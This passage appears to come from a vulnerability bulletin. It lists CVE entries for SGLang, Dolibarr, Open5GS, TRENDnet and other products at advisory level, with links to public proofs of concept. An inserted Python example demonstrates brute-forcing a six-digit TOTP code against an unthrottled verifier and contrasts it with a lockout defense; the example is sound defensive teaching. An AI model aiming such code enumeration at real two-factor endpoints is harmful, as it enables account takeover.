https://plugins.trac.wordpress.org/browser/app-builder/tags/5.6.0/includes/Di/Service/Auth/UploadAvatar.php#L161 https://plugins.trac.wordpress.org/browser/app-builder/trunk/includes/Traits/Permission.php#L33 https://plugins.trac.wordpress.org/browser/app-builder/tags/5.6.0/includes/Traits/Permission.php#L33 https://plugins.trac.wordpress.org/browser/app-builder/tags/5.5.10/includes/Di/Service/Auth/UploadAvatar.php#L80 https://plugins.trac.wordpress.org/browser/app-builder/tags/5.5.10/includes/Di/Service/Auth/UploadAvatar.php#L161 https://plugins.trac.wordpress.org/browser/app-builder/tags/5.5.10/includes/Traits/Permission.php#L33 |
| sgl-project--SGLang | A vulnerability was detected in sgl-project SGLang up to 0.5.9. Impacted is the function get_tokenizer of the file python/sglang/srt/utils/hf_transformers_utils.py of the component HuggingFace Transformer Handler. The manipulation of the argument trust_remote_code with the input False as part of Boolean results in code injection. The attack can be executed remotely. A high complexity level is associated with this attack. The exploitability is considered difficult. In get_tokenizer(), when the caller passes trust_remote_code=False and HuggingFace transformers v5 returns a TokenizersBackend instance (the generic fallback for tokenizer classes not in the registry), SGLang silently re-invokes AutoTokenizer.from_pretrained with trust_remote_code=True, overriding the caller's explicit security setting. A model repository containing a malicious tokenizer.py referenced via auto_map in tokenizer_config.json will execute arbitrary Python in the SGLang process during this second call. No log line or warning is emitted. The override affects all current SGLang versions because transformers==5.3.0 is pinned in pyproject.toml. Both tokenizer_mode="auto" and tokenizer_mode="slow" are affected. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-02 | 5.6 | CVE-2026-7669 | VDB-360817 | sgl-project SGLang HuggingFace Transformer hf_transformers_utils.py get_tokenizer code injection VDB-360817 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #799263 | sgl-project sglang <=0.5.9 Protection Mechanism Failure https://github.com/gouldnicholas/CVE-2026-7669-PoC |
| eyeo--Adblock Plus | A vulnerability was found in eyeo Adblock Plus up to 4.36.2 on Chrome. Affected by this vulnerability is the function postMessage of the file premium.preload.js of the component Legacy Premium Activation. Performing a manipulation results in improper access controls. Remote exploitation of the attack is possible. The exploit has been made public and could be used. Upgrading the affected component is recommended. The vendor provides additional details: "The affected code path is a legacy Premium activation flow that has been deprecated. eyeo has already migrated to a new user account-based licensing system. The exploit does not grant permanent Premium access. The licensing server issues a short-lived trial license (valid for approximately 24 hours) for any submitted userId. On the next license check, the server validates against a real subscription and the trial expires if no valid subscription is found. The researcher's claim of permanently unlocking all Premium features is therefore incorrect. (...) The old flow has been present for years and has not been weaponized at scale to our knowledge. The risk to eyeo and to users is minimal." | 2026-05-03 | 5.3 | CVE-2026-7686 | VDB-360856 | eyeo Adblock Plus Legacy Premium Activation premium.preload.js postMessage access control VDB-360856 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #793551 | Eyeo GmbH Adblock Plus 4.36.2 Privilege Escalation https://github.com/xryj920/CVE/blob/main/adblock_plus_CVE_report.md https://adblockplus.org/en/download |
| Dolibarr--ERP CRM | A vulnerability was identified in Dolibarr ERP CRM up to 23.0.2. This affects the function _checkValForAPI of the file htdocs/expedition/class/expedition.class.php of the component Shipments API Endpoint. The manipulation of the argument fields leads to sql injection. The attack is possible to be carried out remotely. A high degree of complexity is needed for the attack. It is indicated that the exploitability is difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 5 | CVE-2026-7688 | VDB-360858 | Dolibarr ERP CRM Shipments API Endpoint expedition.class.php _checkValForAPI sql injection VDB-360858 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #799337 | Dolibarr Dolibarr ERP CRM 23.0.2 and earlier SQL Injection |
| toeverything--AFFiNE | A vulnerability was detected in toeverything AFFiNE up to 0.26.3. This issue affects the function allowDocPreview of the file /workspace/:workspaceId/:docId of the component Public Markdown Preview Endpoint. The manipulation results in authorization bypass. It is possible to launch the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 5.3 | CVE-2026-7702 | VDB-360871 | toeverything AFFiNE Public Markdown Preview Endpoint :docId allowDocPreview authorization VDB-360871 | CTI Indicators (IOB, IOC, IOA) Submit #804455 | AFFiNE AFFiNE (https://github.com/toeverything/AFFiNE) 0.26.3 Authorization Bypass https://github.com/ngocnn97/security-advisories/blob/main/AFFiNE_BAC_PoC.mp4 |
| VideoFlow Ltd.--VideoFlow Digital Video Protection | VideoFlow Digital Video Protection DVP 2.10 contains an authenticated remote code execution vulnerability that allows authenticated attackers to execute arbitrary system commands by exploiting a cross-site request forgery flaw in the web management interface. Attackers with valid credentials can leverage the CSRF vulnerability to inject and execute system commands through the Tools > System > Shell interface, gaining root-level access to the device. | 2026-04-29 | 4.3 | CVE-2018-25310 | ExploitDB-44387 Vulnerability Advisory VulnCheck Advisory: VideoFlow Digital Video Protection DVP 10 Authenticated Remote Code Execution |
| gnu--wget2 | wget2 accepts a server certificate with incorrect Key Usage (KU) or Extended Key Usage (EKU). If the attackers compromise a certificate (with the associated private key) issued for a different purpose, they may be able to reuse it for TLS server authentication. | 2026-04-29 | 4.8 | CVE-2026-1858 | https://www.tenable.com/security/research/tra-2026-37 |
| wazuh--wazuh | Wazuh is a free and open source platform used for threat prevention, detection, and response. From version 1.0.0 to before version 4.14.4, a heap-based out-of-bounds WRITE occurs in GetAlertData, resulting in writing a NULL byte exactly 1 byte before the start of the buffer allocated by strdup. Due to unsigned integer underflow and pointer arithmetic wrapping, the write lands at offset -1 from the buffer, corrupting heap metadata. A malicious actor can potentially leverage this issue through a compromised agent to cause denial of service or heap corruption by injecting a specially crafted alert into the alerts log file monitored by wazuh-logcollector. This issue has been patched in version 4.14.4. | 2026-04-29 | 4.4 | CVE-2026-26204 | https://github.com/wazuh/wazuh/security/advisories/GHSA-j4c7-hwjw-8857 https://github.com/wazuh/wazuh/releases/tag/v4.14.4 |
| Oracle Corporation--Oracle Linux | An unprivileged attacker can craft a user-space process with a malicious ELF binary containing an out-of-range sh_link field. When root-level dtrace attaches to -- or instruments -- that process (via dtrace -p, pid probes, or USDT), the ELF parser reads heap memory beyond the allocated section cache array without any bounds check. This results in an uninitialized/out-of-bounds heap read that can cause a NULL pointer dereference crash of the dtrace process (DoS), or -- depending on heap layout -- a read-then-use of a garbage pointer controlled by adjacent allocations, providing a foothold toward further exploitation in a privileged context. | 2026-05-01 | 4.4 | CVE-2026-35233 | Oracle Advisory |
| n/a-- V2Board v1.7.4 | SQL Injection via ORDER BY clause in V2Board through 1.7.4. In app/Http/Controllers/Admin/UserController.php, the sort parameter from user input is passed directly to User::orderBy($sort, $sortType) without validation. An authenticated admin can sort users by any database column including password, remember_token, and other sensitive fields, enabling information disclosure through ordering analysis. | 2026-05-01 | 4.9 | CVE-2026-37505 | https://github.com/v2board/v2board https://gist.github.com/sgInnora/1330e1a82caa79906eec55eeff2c99b9 |
| nextlevelbuilder--ui-ux-pro-max-skill | A vulnerability has been found in nextlevelbuilder ui-ux-pro-max-skill up to 2.5.0. Affected by this issue is the function data.get of the file .claude/skills/design-system/scripts/generate-slide.py of the component Slide Generator. Such manipulation leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through a pull request but has not reacted yet. | 2026-05-01 | 4.3 | CVE-2026-7596 | VDB-360549 | nextlevelbuilder ui-ux-pro-max-skill Slide Generator generate-slide.py data.get cross site scripting VDB-360549 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #805510 | nextlevelbuilder ui-ux-pro-max-skill 2.5.0 Slide Generator Multiple Stored XSS https://github.com/nextlevelbuilder/ui-ux-pro-max-skill/issues/247 https://github.com/nextlevelbuilder/ui-ux-pro-max-skill/pull/274 https://github.com/nextlevelbuilder/ui-ux-pro-max-skill/ |
| n/a--Open5GS | A vulnerability has been found in Open5GS up to 2.7.6. Affected is an unknown function of the file src/amf/gmm-handler.c of the component AMF. The manipulation of the argument reg_type leads to denial of service. The attack is possible to be carried out remotely. Upgrading to version 2.7.7 is able to address this issue. The identifier of the patch is ebc66942b6f8f1fab2d640e71cf4e9f1a423b426. It is advisable to upgrade the affected component. | 2026-05-02 | 4.3 | CVE-2026-7601 | VDB-360558 | Open5GS AMF gmm-handler.c denial of service VDB-360558 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #805675 | Open5GS v.2.7.6 Denial of Service https://github.com/open5gs/open5gs/issues/4321 https://github.com/open5gs/open5gs/commit/ebc66942b6f8f1fab2d640e71cf4e9f1a423b426 https://github.com/open5gs/open5gs/releases/tag/v2.7.7 https://github.com/open5gs/open5gs/ |
| itsourcecode--Courier Management System | A vulnerability was determined in itsourcecode Courier Management System 1.0. Affected is an unknown function of the file /edit_user.php. Executing a manipulation of the argument ID can lead to sql injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. | 2026-05-02 | 4.7 | CVE-2026-7612 | VDB-360569 | itsourcecode Courier Management System edit_user.php sql injection VDB-360569 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806275 | itsourcecode Courier Management System V1.0 SQL Injection https://github.com/ltranquility/submit/issues/12 https://itsourcecode.com/ |
| ChatGPTNextWeb--NextChat | A flaw has been found in ChatGPTNextWeb NextChat up to 2.16.1. This impacts an unknown function of the file Next.js of the component API Endpoint. Executing a manipulation can lead to permissive cross-domain policy with untrusted domains. The attack may be launched remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-02 | 4.3 | CVE-2026-7643 | VDB-360755 | ChatGPTNextWeb NextChat API Endpoint Next.js cross-domain policy VDB-360755 | CTI Indicators (IOB, IOC, IOA) Submit #806833 | ChatGPTNextWeb NextChat 2.16.1 Permissive CORS Wildcard Policy https://github.com/ChatGPTNextWeb/NextChat/issues/6756 https://github.com/ChatGPTNextWeb/NextChat/ |
| n/a--crmeb_java | A vulnerability was detected in crmeb_java up to 1.3.4. This vulnerability affects unknown code of the file crmeb/crmeb-service/src/main/java/com/zbkj/service/service/impl/UploadServiceImpl.java of the component Admin Upload. Performing a manipulation of the argument model results in unrestricted upload. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 4.7 | CVE-2026-7673 | VDB-360826 | crmeb_java Admin Upload UploadServiceImpl.java unrestricted upload VDB-360826 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800684 | crmeb crmeb_java 1.3.4 Unrestricted Upload https://fx4tqqfvdw4.feishu.cn/docx/EgMOdHyq6oyxhux5vpJcr5cgnAf?from=from_copylink |
| kerwincui--FastBee | A vulnerability was found in kerwincui FastBee up to 1.2.1. The affected element is the function ToolController.download of the file springboot/fastbee-open-api/src/main/java/com/fastbee/data/controller/ToolController.java of the component Tool Download Endpoint. The manipulation of the argument fileName results in path traversal. The attack may be performed from remote. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 4.3 | CVE-2026-7676 | VDB-360829 | kerwincui FastBee Tool Download Endpoint ToolController.java ToolController.download path traversal VDB-360829 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800723 | kerwincui FastBee ≤ 1.2.1 Path Traversal https://fx4tqqfvdw4.feishu.cn/docx/Yv1gdAzFpoHCUUxDdKSculR4nKf?from=from_copylink |
| jsbroks--COCO Annotator | A weakness has been identified in jsbroks COCO Annotator up to 0.11.1. Affected is an unknown function of the file backend/webserver/api/datasets.py of the component Data Endpoint. Executing a manipulation of the argument folder can lead to path traversal. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 4.3 | CVE-2026-7680 | VDB-360833 | jsbroks COCO Annotator Data Endpoint datasets.py path traversal VDB-360833 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #801150 | jsbroks COCO Annotator 0.11.1 Absolute Path Traversal https://github.com/natanmorette-thoropass/thoropass-vuln-research-program/tree/main/2026/Path%20Traversal%20via%20Dataset%20Folder%20Parameter |
| AMTT--Hotel Broadband Operation System | A vulnerability was determined in AMTT Hotel Broadband Operation System 1.0. Affected is an unknown function of the file /manager/card/cardhand_submit.php. This manipulation of the argument ID causes sql injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 4.7 | CVE-2026-7697 | VDB-360866 | AMTT Hotel Broadband Operation System cardhand_submit.php sql injection VDB-360866 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #803272 | Anmei Century (Beijing) Technology Co., Ltd. Hotel Broadband Operation System v1.0 SQL Injection https://github.com/testnet0/testnet/issues/74 |
| Telegram--Desktop | A security vulnerability has been detected in Telegram Desktop up to 6.7.5. This vulnerability affects the function RequestButton of the file Telegram/SourceFiles/boxes/url_auth_box.cpp of the component Bot API. The manipulation of the argument login_url leads to null pointer dereference. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 4.3 | CVE-2026-7701 | VDB-360870 | Telegram Desktop Bot API url_auth_box.cpp RequestButton null pointer dereference VDB-360870 | CTI Indicators (IOB, IOC, IOA) Submit #804341 | Telegram Telegram Desktop <= 6.7.5 NULL Pointer Dereference https://www.youtube.com/watch?v=xo9Bplsy1K8 |
| AV Stumpfl--Pixera Two Media Server | A vulnerability has been found in AV Stumpfl Pixera Two Media Server up to 25.1 R2. The affected element is an unknown function of the component Service Port 1338. Such manipulation leads to path traversal. The exploit has been disclosed to the public and may be used. Upgrading to version 25.2 R3 is sufficient to fix this issue. It is advisable to upgrade the affected component. | 2026-05-03 | 4.3 | CVE-2026-7704 | VDB-360873 | AV Stumpfl Pixera Two Media Server Service Port 1338 path traversal VDB-360873 | CTI Indicators (IOB, IOC, TTP) Submit #805275 | AV Stumpfl Pixera Two Media Server < 25.2 R3 Arbitrary File Read https://gist.github.com/TrebledJ/585a20525e45549f299d282233632608 https://help.pixera.one/changelogs-version-overviews/pixera-252-overview-changelog |
| n/a--Open5GS | A vulnerability has been found in Open5GS up to 2.7.7. This issue affects the function gmm_handle_service_request of the file /src/amf/gmm-handler.c of the component AMF. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-03 | 4.3 | CVE-2026-7706 | VDB-360882 | Open5GS AMF gmm-handler.c gmm_handle_service_request denial of service VDB-360882 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #805698 | Open5GS AMF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4409 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability was found in Open5GS up to 2.7.7. Impacted is the function udr_nudr_dr_handle_subscription_context of the file /src/udr/nudr-handler.c of the component UDR. The manipulation of the argument pei results in denial of service. The attack can be launched remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-03 | 4.3 | CVE-2026-7707 | VDB-360883 | Open5GS UDR nudr-handler.c udr_nudr_dr_handle_subscription_context denial of service VDB-360883 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #805699 | Open5gs UDR v2.7.7 Denial of Service Submit #805700 | Open5gs UDR v2.7.7 Denial of Service (Duplicate) https://github.com/open5gs/open5gs/issues/4410 https://github.com/open5gs/open5gs/issues/4411 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability was determined in Open5GS up to 2.7.7. The affected element is the function ogs_dbi_subscription_data in the library /lib/dbi/subscription.c of the component UDR. This manipulation of the argument supi_id causes denial of service. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-03 | 4.3 | CVE-2026-7708 | VDB-360884 | Open5GS UDR subscription.c ogs_dbi_subscription_data denial of service VDB-360884 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #805701 | Open5gs UDR v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4412 https://github.com/open5gs/open5gs/ |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Oracle Corporation--Oracle Linux | An unprivileged attacker can reliably trigger a crash of the dtrace process with a malicious ELF binary due to an integer Divide-by-Zero in Pbuild_file_symtab() | 2026-05-01 | 3.3 | CVE-2026-21996 | Oracle Advisory |
| redhat[.]com--gnutls | A flaw was found in gnutls. A remote attacker could exploit this vulnerability by presenting a specially crafted Online Certificate Status Protocol (OCSP) response during a TLS handshake. Due to a logic error in how gnutls processes multi-record OCSP responses, a client with OCSP verification enabled may incorrectly accept a revoked server certificate, potentially leading to a compromise of trust. | 2026-04-30 | 3.7 | CVE-2026-3832 | RHSA-2026:13274 https://access.redhat.com/security/cve/CVE-2026-3832 RHBZ#2445762 https://gitlab.com/gnutls/gnutls/-/issues/1801 |
| TRENDnet--TEW-821DAP | A weakness has been identified in TRENDnet TEW-821DAP 1.12B01. This issue affects the function find_hwid/new_gui_update_firmware of the component Firmware Update Handler. Executing a manipulation of the argument dest can lead to insufficient verification of data authenticity. The attack can be launched remotely. Attacks of this nature are highly complex. The exploitability is assessed as difficult. The vendor explains: "That firmware version will only work on our hardware version v1.xR. We have already EOL that product 8 years ago and are no longer selling". This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-02 | 3.7 | CVE-2026-7606 | VDB-360563 | TRENDnet TEW-821DAP Firmware Update new_gui_update_firmware data authenticity VDB-360563 | CTI Indicators (IOB, IOC, IOA) Submit #806213 | Trendnet TEW-821DAP v1.12B01 CWE-287 Improper Authentication https://github.com/IOTRes/IOT_Firmware_Update/blob/main/Trendnet/TEW-821DAP_Auth.md |
| TRENDnet--TEW-821DAP | A vulnerability has been found in TRENDnet TEW-821DAP 1.12B01. This affects an unknown function of the file /www/cgi/ssi of the component Firmware Update. Such manipulation leads to cleartext transmission of sensitive information. The attack can be executed remotely. This attack is characterized by high complexity. The exploitability is reported as difficult. The exploit has been disclosed to the public and may be used. The vendor explains: "That firmware version will only work on our hardware version v1.xR. We have already EOL that product 8 years ago and are no longer selling". This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-02 | 3.7 | CVE-2026-7610 | VDB-360567 | TRENDnet TEW-821DAP Firmware Update ssi cleartext transmission VDB-360567 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806217 | Trendnet TEW-821DAP v1.12B01 CWE-319: Cleartext Transmission of Sensitive Information https://github.com/IOTRes/IOT_Firmware_Update/blob/main/Trendnet/TEW-821DAP_Down.md |
| TRENDnet--TEW-821DAP | A vulnerability was found in TRENDnet TEW-821DAP up to 1.12B01. This impacts the function platform_do_upgrade_cameo_dev of the file cameo_dev.sh of the component Firmware Update Handler. Performing a manipulation results in insufficient verification of data authenticity. The attack is possible to be carried out remotely. The complexity of an attack is rather high. The exploitability is said to be difficult. The vendor explains: "That firmware version will only work on our hardware version v1.xR. We have already EOL that product 8 years ago and are no longer selling". This vulnerability only affects products that are no longer supported by the maintainer. | 2026-05-02 | 3.7 | CVE-2026-7611 | VDB-360568 | TRENDnet TEW-821DAP Firmware Update cameo_dev.sh platform_do_upgrade_cameo_dev data authenticity VDB-360568 | CTI Indicators (IOB, IOC, IOA) Submit #806218 | Trendnet TEW-821DAP v1.12B01 CWE-327 Use of a Broken or Risky Cryptographic Algorithm https://github.com/IOTRes/IOT_Firmware_Update/blob/main/Trendnet/TEW-821DAP_Inte.md |
| CodeWise--Tornet Scooter Mobile App | A vulnerability has been found in CodeWise Tornet Scooter Mobile App 4.75 on iOS/Android. The impacted element is an unknown function of the file /TwoFactor. Such manipulation leads to improper restriction of excessive authentication attempts. The attack may be performed from remote. Attacks of this nature are highly complex. The exploitability is regarded as difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-02 | 3.7 | CVE-2026-7671 | VDB-360819 | CodeWise Tornet Scooter Mobile App TwoFactor excessive authentication VDB-360819 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #799987 | CodeWise Technologies, Tornet Scooter (Mobile APP) 4.75 Improper Restriction of Excessive Authentication Attempts (CWE-3 https://drive.proton.me/urls/M0WFM4137W#MY0jA6pjHYPO |
| kerwincui--FastBee | A vulnerability was determined in kerwincui FastBee up to 1.2.1. The impacted element is the function Add of the file springboot/fastbee-admin/src/main/java/com/fastbee/web/controller/system/SysNoticeController.java of the component System Notice Handler. This manipulation of the argument noticeContent causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 3.5 | CVE-2026-7677 | VDB-360830 | kerwincui FastBee System Notice SysNoticeController.java add cross site scripting VDB-360830 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800724 | kerwincui FastBee ≤ 1.2.1 Improper Neutralization of Alternate XSS Syntax https://fx4tqqfvdw4.feishu.cn/docx/Iu5Dd558UoS4uIxhH9YcgNsWnjc?from=from_copylink |
| Dolibarr--ERP CRM | A security flaw has been discovered in Dolibarr ERP CRM up to 23.0.2. This vulnerability affects the function dol_verifyHash in the library htdocs/core/lib/security.lib.php of the component Online Signature Module. The manipulation results in improper verification of cryptographic signature. The attack may be performed from remote. Attacks of this nature are highly complex. It is stated that the exploitability is difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-03 | 3.7 | CVE-2026-7689 | VDB-360859 | Dolibarr ERP CRM Online Signature security.lib.php dol_verifyHash signature verification VDB-360859 | CTI Indicators (IOB, IOC, IOA) Submit #801794 | Dolibarr Dolibarr ERP/CRM 23.0.2 Authentication Bypass Issues https://gist.github.com/Shaon-Xis/d6ae069fc54f006457b68a91d5a8e158 |
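The CodeWise Tornet entry above (CVE-2026-7671, improper restriction of excessive authentication attempts on a /TwoFactor endpoint) is the classic CWE-307 case for a second factor: a six-digit code is only as strong as the number of guesses the server will check. The block below is an added example, not code from CodeWise or from any product in this table. It implements RFC 6238 TOTP with the Python standard library and contrasts a verifier that checks every submission against one that counts failures per account and locks the account out. The class names, `MAX_FAILURES`, `LOCKOUT_SECONDS`, the `brute_force` attacker model and the demo secret (the RFC 6238 test-vector key) are illustrative assumptions.

```python
"""Added example (not CodeWise/Tornet code): RFC 6238 TOTP verification
with and without a per-account attempt limit. The limit and lockout
values are assumed, illustrative policy, not anything the vendor ships."""
import hashlib
import hmac
import struct

DIGITS = 6
STEP_SECONDS = 30
MAX_FAILURES = 5          # assumption: failures allowed before lockout
LOCKOUT_SECONDS = 900     # assumption: lockout length after MAX_FAILURES


def totp(secret: bytes, unix_time: int) -> str:
    """RFC 6238 TOTP (HMAC-SHA1, 30 s step) truncated to DIGITS digits."""
    counter = struct.pack(">Q", unix_time // STEP_SECONDS)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{code % 10 ** DIGITS:0{DIGITS}d}"


class UnthrottledVerifier:
    """The vulnerable pattern: every submission is checked, however many."""

    def __init__(self, secret: bytes) -> None:
        self.secret = secret

    def verify(self, code: str, now: int) -> bool:
        return hmac.compare_digest(code, totp(self.secret, now))


class ThrottledVerifier:
    """Hardened pattern: count failures per account and lock the account out."""

    def __init__(self, secret: bytes) -> None:
        self.secret = secret
        self.failures = 0
        self.locked_until = 0

    def verify(self, code: str, now: int) -> bool:
        if now < self.locked_until:
            return False          # while locked, even the right code is rejected
        if hmac.compare_digest(code, totp(self.secret, now)):
            self.failures = 0
            return True
        self.failures += 1
        if self.failures >= MAX_FAILURES:
            self.locked_until = now + LOCKOUT_SECONDS
            self.failures = 0
        return False


def brute_force(verifier, now: int, budget: int):
    """Attacker model: submit 000000, 000001, ... within a single time step.
    Returns the guess that was accepted, or None if none was within budget."""
    for guess in range(budget):
        if verifier.verify(f"{guess:0{DIGITS}d}", now):
            return guess
    return None


if __name__ == "__main__":
    # Constructed demo secret (the RFC 6238 test-vector key), not a real credential.
    secret = b"12345678901234567890"
    now = 59
    correct = totp(secret, now)          # "287082" per RFC 6238 Appendix B
    budget = int(correct) + 1
    print("unthrottled brute force found:", brute_force(UnthrottledVerifier(secret), now, budget))
    print("throttled brute force found:  ", brute_force(ThrottledVerifier(secret), now, budget))
```

The unthrottled verifier is found by simple enumeration inside one 30-second step; the throttled one rejects everything after `MAX_FAILURES` wrong codes, including the correct one, until the lockout expires. In a real deployment the failure counter and lock must live server-side per account (and ideally per source as well), not in anything the client can reset.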
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| n/a--Sourcecodester Online Job Portal phppdo 1.0 | SQL Injection vulnerability exists in Sourcecodester Online Job Portal phppdo 1.0 via the category parameter in /jobportal/index.php. | 2026-04-27 | not yet calculated | CVE-2021-36438 | https://www.linkedin.com/in/mohamed-elobeid-oscp-ewptxv2-crtp-cissp-mba-537ba485/ https://thecyberpost.com/tools/exploits-cve/online-job-portal-in-php-pdo-1-0-sql-injection/ |
| Lobster GmbH--Lobster_pro | Unauthenticated attackers can exploit a weakness in the XML parser functionality of Lobster_pro prior to version 4.12.6-GA. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET requests to arbitrary services. | 2026-04-30 | not yet calculated | CVE-2024-13971 | https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-005/ |
| 4D--4D Server | Unauthenticated attackers can exploit a weakness in the XML parser functionality of the SOAP endpoints in 4D server. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET requests to arbitrary services. | 2026-04-30 | not yet calculated | CVE-2024-39847 | https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-002/ https://4d.com |
| n/a--NASA EOSDIS MODAPS | NASA Earth Observing System Data and Information System (EOSDIS) MODAPS v8.1 was discovered to contain a SQL injection vulnerability in the category parameter | 2026-04-27 | not yet calculated | CVE-2024-46636 | https://www.linkedin.com/in/abdulrahman-aldossary-842b6b26b/ https://bugcrowd.com/Xnu11 https://github.com/NU1L0/CVE-2024-46636-SQLi-MODAPS |
| Hanwha Vision--QND-8080R | Penetration Testing engineers at Amazon have discovered a flaw where the camera system fails to properly handle data supplied in certain requests, causing a service disruption. The manufacturer has released patch firmware for the flaw, please refer to the manufacturer's report for details and workarounds. | 2026-04-28 | not yet calculated | CVE-2024-54011 | https://www.hanwhavision.com/wp-content/uploads/2026/04/Camera-Vulnerability-ReportCVE-2024-5401154013.pdf |
| Hanwha Vision--QND-8080R | Penetration Testing engineers at Amazon discovered a vulnerability where the camera system failed to properly validate input, allowing specially crafted requests containing malicious commands to be executed on the device. The manufacturer has released patch firmware for the flaw; please refer to the manufacturer's report for details and workarounds. | 2026-04-28 | not yet calculated | CVE-2024-54012 | https://www.hanwhavision.com/wp-content/uploads/2026/04/Camera-Vulnerability-ReportCVE-2024-5401154013.pdf |
| Hanwha Vision--QND-8080R | Penetration Testing engineers at Amazon have identified a security flaw related to request handling in the web server component that could, under certain conditions, lead to unintended access to protected functions. The manufacturer has released patch firmware for the flaw, please refer to the manufacturer's report for details and workarounds | 2026-04-28 | not yet calculated | CVE-2024-54013 | https://www.hanwhavision.com/wp-content/uploads/2026/04/Camera-Vulnerability-ReportCVE-2024-5401154013.pdf |
| DeskTime--DeskTime Time Tracking App | Due to improper TLS certificate validation in the DeskTime Time Tracking App before version 1.3.674, attackers who can position themselves in the network path between the client and the DeskTime update servers can return a malicious executable in response to an update request. This allows the attacker to achieve user-level remote code execution on the affected client. | 2026-04-28 | not yet calculated | CVE-2025-10539 | https://r.sec-consult.com/desktime https://desktime.com/download |
| RTI--Connext Professional | Improper Restriction of XML External Entity Reference vulnerability in Connext Professional (Core Libraries) allows Serialized Data External Linking. This issue affects Connext Professional: from 7.4.0 before 7.7.0, from 7.0.0 before 7.3.1.1, from 6.1.0 before 6.1.*, from 6.0.0 before 6.0.*, from 5.3.0 before 5.3.*, from 4.3x before 5.2.*. | 2026-04-30 | not yet calculated | CVE-2025-14543 | https://www.rti.com/vulnerabilities/#cve-2025-14543 |
| The Qt Company--Qt | Insufficient validation of node IDs in Qt SVG module allows arbitrary QML/JavaScript code injection when loading malicious SVG files through the VectorImage component in Qt Quick. While QML execution is typically more restricted than native code execution, this could still lead to denial of service, information disclosure, or other impacts depending on the application's privilege level and data access. | 2026-04-30 | not yet calculated | CVE-2025-14576 | Qt Code Review - Fix for QTBUG-142556 |
| Ribblr--Crochet and Knitting | An authenticated user can bypass authorization in the Ribblr - Crochet & Knitting iOS application. | 2026-04-27 | not yet calculated | CVE-2025-15626 | https://ribblr.com/ |
| Apache Software Foundation--Apache Thrift | Mismatched Memory Management Routines vulnerability in Apache Thrift c_glib language bindings. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue. Description: Specially crafted requests can crash a c_glib-based Thrift server with a clean but fatal "free(): invalid pointer" error message. | 2026-04-28 | not yet calculated | CVE-2025-48431 | https://lists.apache.org/thread/lb4j0zyd5f3g36cos0wql925przpnwql |
| n/a--B1 Free Archiver v1.5.86 | A vulnerability in B1 Free Archiver v1.5.86 allows files extracted from downloaded archives to bypass Windows Mark of the Web (MotW) protections. When an archive is downloaded from the internet and extracted using B1 Free Archiver, the software fails to propagate the 'Zone.Identifier' alternate data stream to the extracted files. As a result, these files can be executed without triggering Windows Defender SmartScreen warnings or security prompts, enabling untrusted code execution without standard security restrictions. | 2026-04-29 | not yet calculated | CVE-2025-50328 | https://b1.org/ https://github.com/math69b/B1FREE/blob/main/B1%20Free%20Archiver%20version |
